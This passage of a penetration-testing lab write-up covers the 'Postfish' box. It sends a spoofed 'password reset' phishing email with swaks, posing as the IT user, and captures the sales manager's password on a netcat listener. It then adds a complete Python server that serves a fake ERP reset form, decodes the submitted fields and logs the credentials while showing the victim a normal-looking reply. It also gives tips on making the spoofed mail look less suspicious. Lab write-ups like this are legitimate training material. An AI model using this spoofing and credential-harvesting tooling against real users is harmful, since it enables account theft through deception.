Phishing
The target web server discloses four possible users, and all four were confirmed to exist on the target SMTP server. While user behaviour cannot be predicted at this time, the target SMTP server accepts mail without authentication, so the sender address can be spoofed freely. Additional username enumeration and a brute-force attack identified a valid credential for the sales user, which led to a mail from the it user about sending “password reset links” to register the sales team to the ERP system. Given that the brian.moore user is a Sales Manager, it should be possible to send the brian.moore user a phishing email containing a “password reset link” while posing as the it user, with the link pointing at a listener on the Kali host.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ swaks --to brian.moore@postfish.off --from it@postfish.off --header "subject: Password Reset link" --body "http://192.168.45.192/password_reset" --server $IP --port 25
=== Trying 192.168.111.137:25...
=== Connected to 192.168.111.137.
<- 220 postfish.off ESMTP Postfix (Ubuntu)
-> EHLO kali
<- 250-postfish.off
<- 250-PIPELINING
<- 250-SIZE 10240000
<- 250-VRFY
<- 250-ETRN
<- 250-STARTTLS
<- 250-ENHANCEDSTATUSCODES
<- 250-8BITMIME
<- 250-DSN
<- 250-SMTPUTF8
<- 250 CHUNKING
-> MAIL FROM:<it@postfish.off>
<- 250 2.1.0 Ok
-> RCPT TO:<brian.moore@postfish.off>
<- 250 2.1.5 Ok
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Wed, 26 Mar 2025 14:18:46 +0100
-> To: brian.moore@postfish.off
-> From: it@postfish.off
-> Subject: test Wed, 26 Mar 2025 14:18:46 +0100
-> Message-Id: <20250326141846.132243@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> subject: Password Reset link
->
-> http://192.168.45.192/password_reset
->
->
-> .
<- 250 2.0.0 Ok: queued as 74621458F8
-> QUIT
<- 221 2.0.0 Bye
=== Connection closed with remote host.
Phishing mail sent to the brian.moore user as the it user with a “password reset link” in the body. The server queued it (250 2.0.0 Ok) without asking for any authentication. Note that the lowercase “subject:” header given to --header was appended rather than replacing swaks’ default “Subject: test …” line, so the queued message carries two subject headers, presumably because the header match is case-sensitive; passing --header "Subject: Password Reset link" (capitalised, matching the default header name) avoids the duplicate, which a suspicious mail client could flag.
Credential Retrieval
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ nnc 80
listening on [any] 80 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.111.137] 50342
POST /password_reset HTTP/1.1
Host: 192.168.45.192
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confirm_password%3DEternaLSunshinE
A moment later, a POST request arrived at the netcat listener on the Kali host with a URL-encoded form body containing the brian.moore user’s credentials. The body is encoded twice: even the “=” and “&” separators of the form arrived as %3D and %26, so one pass of URL decoding is needed before the fields can be read.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/postfish]
└─$ hurl -u 'first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confirm_password%3DEternaLSunshinE'
Original :: first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off%26username%3Dbrian.moore%26password%3DEternaLSunshinE%26confirm_password%3DEternaLSunshinE
URL DEcoded :: first_name=Brian&last_name=Moore&email=brian.moore%postfish.off&username=brian.moore&password=EternaLSunshinE&confirm_password=EternaLSunshinE
The password of the brian.moore user is EternaLSunshinE.
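Rather than reading the raw POST off a netcat listener and decoding it by hand with hurl, a small HTTP listener can answer the phishing link, decode the form body (including the double-encoded case seen above) and print the credential fields as they arrive. The following Python script is an added example, not part of the original write-up or of the lab; it assumes the same /password_reset path used in the phishing mail and port 80 on the Kali host, and the sample body embedded in it is reconstructed from the capture above rather than taken from a live request.

```python
#!/usr/bin/env python3
"""Catch the phished "password reset" POST and decode the credential fields.

Added example (not from the original write-up): stands in for the
netcat listener on port 80 plus the manual hurl decode. Path and port
are assumptions matching the link sent in the phishing mail.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qsl, unquote

RESET_PATH = "/password_reset"          # must match the URL in the phishing mail
CREDENTIAL_KEYS = ("username", "email", "password", "confirm_password")

# Constructed test input, reconstructed from the capture above (not a live
# request): note that '=' and '&' themselves arrived as %3D and %26.
CAPTURED_BODY = (
    b"first_name%3DBrian%26last_name%3DMoore%26email%3Dbrian.moore%postfish.off"
    b"%26username%3Dbrian.moore%26password%3DEternaLSunshinE"
    b"%26confirm_password%3DEternaLSunshinE"
)


def extract_credentials(body: bytes) -> dict:
    """Parse an application/x-www-form-urlencoded body into a dict.

    Handles the double-encoded case seen on this box: when the body has no
    literal '=' but does contain percent escapes, unquote one layer (at most
    a few times) until the real separators appear, then split on them.
    Invalid escapes such as the '%po' in the email field are left as-is.
    """
    text = body.decode("utf-8", errors="replace")
    for _ in range(3):
        if "=" in text or "%" not in text:
            break
        text = unquote(text)
    return dict(parse_qsl(text, keep_blank_values=True))


def credential_lines(fields: dict) -> list:
    """Pick out the interesting fields, in a fixed order, for logging."""
    return [f"{key}={fields[key]}" for key in CREDENTIAL_KEYS if key in fields]


class ResetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve a minimal reset form at the phishing path so the link looks alive
        # if the victim (or a mail scanner) opens it in a browser first.
        if self.path != RESET_PATH:
            self.send_error(404)
            return
        page = (b"<html><body><h2>ERP password reset</h2>"
                b"<form method='POST'>"
                b"Username <input name='username'><br>"
                b"New password <input name='password' type='password'><br>"
                b"Confirm <input name='confirm_password' type='password'><br>"
                b"<input type='submit' value='Reset'></form></body></html>")
        self._reply(page)

    def do_POST(self):
        # Read exactly Content-Length bytes, decode, and log the credentials.
        length = int(self.headers.get("Content-Length", "0"))
        fields = extract_credentials(self.rfile.read(length))
        print(f"[+] POST {self.path} from {self.client_address[0]}")
        for line in credential_lines(fields):
            print("    " + line)
        # Answer like a real reset form would so the victim sees nothing odd.
        self._reply(b"<html><body>Password updated.</body></html>")

    def _reply(self, page: bytes):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(page)))
        self.end_headers()
        self.wfile.write(page)


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 80   # binding 80 needs root
    HTTPServer(("0.0.0.0", port), ResetHandler).serve_forever()
```

Run it with sudo (or pass an unprivileged port and adjust the link in the swaks body) before sending the phishing mail; the decode step only strips a layer of percent-encoding when no literal “=” is present, so a normally encoded form submission is parsed unchanged.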
Validating against the target SSH server